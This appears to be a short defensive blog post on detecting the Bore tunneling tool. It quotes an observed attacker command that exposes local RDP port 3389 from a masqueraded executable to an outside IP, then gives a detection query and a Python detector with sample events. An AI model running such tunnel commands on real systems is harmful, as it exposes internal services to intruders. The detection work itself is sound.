066. Detecting Bore - Another Tunneling Tool in Adversary's Kit

Hello everyone! Tunneling tools - they are everywhere! Today we'll look at another example observed in the wild - Bore.


It's a CLI tool that exposes local ports to a remote server. Want an example? Sure, here you go:

"%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238

Third-rate masquerading, right? I think you noticed the interesting command line parameters we can use for building detections. Here's an example:

event_type: "processcreate" 

AND 

cmdline.keyword: /.* local .*/ 

AND 

cmdline: (("3389" OR "22") AND "to")

Of course, you can experiment with port numbers and exclusions!
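To show how the query above behaves against process-creation telemetry, here is an added Python example (mine, not code from the post or from the Bore project). It runs the query logic over a handful of constructed events, side by side with a tighter variant that requires the actual Bore argument sequence local <port> --to <host> and accepts an exclusion list of known-good image paths. The sample events, the tokenizer that approximates how a text analyzer turns "--to" into the term "to", and the hostname tunnel.example.invalid are all assumptions made for the example.

```python
import re

# Constructed sample process-creation events, not real telemetry.
# The first one mirrors the command line from the post.
SAMPLE_EVENTS = [
    {"event_type": "processcreate",
     "cmdline": r'"%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238'},
    {"event_type": "processcreate",
     "cmdline": "bore.exe local 22 --to tunnel.example.invalid"},
    # Benign: "local", "to" and "3389" all appear, but only inside a file name.
    {"event_type": "processcreate",
     "cmdline": r'notepad.exe "C:\Users\x\port forward local to 3389.txt"'},
    # Bore exposing a port the query does not watch.
    {"event_type": "processcreate",
     "cmdline": "bore.exe local 8080 --to 91.202.233[.]238"},
    # Same command line, wrong event type.
    {"event_type": "networkconnect",
     "cmdline": "bore.exe local 3389 --to 91.202.233[.]238"},
]

WATCHED_PORTS = ("3389", "22")

# A regexp on a keyword field is anchored to the whole value,
# hence the .* on both sides in the original query.
LOCAL_RE = re.compile(r".* local .*")


def query_tokens(cmdline):
    """Approximation (assumed) of what a standard text analyzer makes of a
    command line: lower-cased alphanumeric runs, so '--to' yields the term 'to'."""
    return set(re.findall(r"[a-z0-9]+", cmdline.lower()))


def matches_broad_rule(event, ports=WATCHED_PORTS):
    """Literal port of the query from the post."""
    if event.get("event_type") != "processcreate":
        return False
    cmdline = event.get("cmdline", "")
    if not LOCAL_RE.search(cmdline):
        return False
    terms = query_tokens(cmdline)
    return "to" in terms and any(p in terms for p in ports)


def split_cmdline(cmdline):
    """Split on whitespace but keep double-quoted arguments whole."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def matches_structural_rule(event, ports=WATCHED_PORTS, excluded_images=()):
    """Tighter variant: requires the argument sequence  local <port> --to <host>
    and skips known-good image paths (case-insensitive, quotes ignored)."""
    if event.get("event_type") != "processcreate":
        return False
    argv = split_cmdline(event.get("cmdline", ""))
    if len(argv) < 5:
        return False
    image = argv[0].strip('"').lower()
    if image in (x.lower() for x in excluded_images):
        return False
    args = argv[1:]
    for i in range(len(args) - 3):
        if args[i] == "local" and args[i + 1] in ports and args[i + 2] == "--to":
            return True
    return False


def run_rules(events, **kwargs):
    """Return [(index, broad_hit, structural_hit)] for every event."""
    ports = kwargs.get("ports", WATCHED_PORTS)
    return [(i, matches_broad_rule(e, ports), matches_structural_rule(e, **kwargs))
            for i, e in enumerate(events)]


if __name__ == "__main__":
    for idx, broad, structural in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: broad={broad} structural={structural}")
```

The third sample is the kind of false positive the broad query produces when the three terms merely co-occur in a file name; the structural rule ignores it because the quoted path is a single argument. Passing ports=("8080",) to either function is the "experiment with port numbers" step, and excluded_images is the exclusion hook.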

See you tomorrow!
